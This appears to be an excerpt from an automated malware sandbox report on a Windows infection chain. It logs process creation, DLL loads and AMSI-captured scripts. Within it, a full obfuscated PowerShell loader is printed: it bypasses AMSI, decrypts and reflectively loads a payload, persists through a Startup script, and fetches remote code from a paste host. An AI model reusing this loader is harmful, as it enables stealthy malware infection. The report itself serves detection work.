Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function 
SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat", "true");ITextStream.WriteLine("%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%");ITextStream.WriteLine("%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n");ITextStream.WriteLine("%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"");ITextStream.WriteLine("%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"");ITextStream.WriteLine("%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE");ITextStream.WriteLine("%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)");ITextStream.WriteLine("::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1btrn1Ohc8XLqC+TVYU618+2McBwH1rcwLZVzR1wGZpPqFsadbCBhjYZBcLDjAEqyKUm7wUHi7AaGpVQ5ixdI7YNMHi6ejdV0aLXjrwWxwCOTMiYgXy73aP+f2r");ITextStream.WriteLine("%LRVWJ%s%LRVWJ%e%LRVWJ%t%LRVWJ% "AK=%LRVWJ%WOULDE%LRVWJOULDE%i%LRVWJ%nOULDE%LRVWJ%dOULDE%LRVWJOULDE%o%LRVWJOULDE%wOULDE%LRVWJ%OULDEs%LRVWJOULDE%P%OULDELRVWJ%oOULDE%LRVWJ%w%OULDELRVWJOULDE%e%LRVWJOULDE%rOULDE%OULDELRVWJ%SOULDE");ITextStream.WriteLine("%YGD%s%YGD%e%YGD%t%YGD% BP=C:\Windows\SysWOW64\%AK:OULDE=%");ITextStream.WriteLine("%ZNLHZ%i%ZNLHZ%f%ZNLHZ% %ZNLHZ%n%ZNLHZ%o%ZNLHZ%t%ZNLHZ% %ZNLHZ%e%ZNLHZ%x%ZNLHZ%i%ZNLHZ%s%ZNLHZ%t%ZNLHZ% %BP% (set BP=%BP:SysWOW64=System32%)");ITextStream.WriteLine("%EUZLM%s%EUZLM%e%EUZLM%t%EUZLM% "YASETD=;$POIOULDEJOOULDEGOULDED='ROULDEeaOULDEdLEOULDEKOXOULDECULOULDEinOULDEeOULDEEKOXCOULDEULOULDEsEOULDEKOULDEOXCULOULDE'.ROULDEepOULDElOULDEaOULDEce('EOULDEKOXCUOULDEL'OULDE,OULDE 'OULDE')");ITextStream.WriteLine("%RSTYH%s%RSTYH%e%RSTYH%t%RSTYH% "KRRBGS=$hOULDEost.OULDEUI.ROULDEawUOULDEI.WOULDEiOULDEndowOULDETiOULDEtle=OULDE"");ITextStream.WriteLine("%QZZPO%e%QZZPO%c%QZZPO%h%QZZPO%o%QZZPO% %KRRBGS:OULDE=%'%~0'%YASETD:OULDE=% | %BP%");ITextStream.WriteLine("%PIIBS%t%PIIBS%i%PIIBS%m%PIIBS%e%PIIBS%o%PIIBS%u%PIIBS%t%PIIBS% %PIIBS%/%PIIBS%n%PIIBS%o%PIIBS%b%PIIBS%r%PIIBS%e%PIIBS%a%PIIBS%k%PIIBS% %PIIBS%/%PIIBS%t%PIIBS% %PIIBS%1%PIIBS% %PIIBS%>%PIIBS%n%PIIBS%u%PIIBS%l%PIIBS%");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat", "true");ITextStream.WriteLine("%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%");ITextStream.WriteLine("%OAV%s%OAV%
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this mod
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Micros
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex 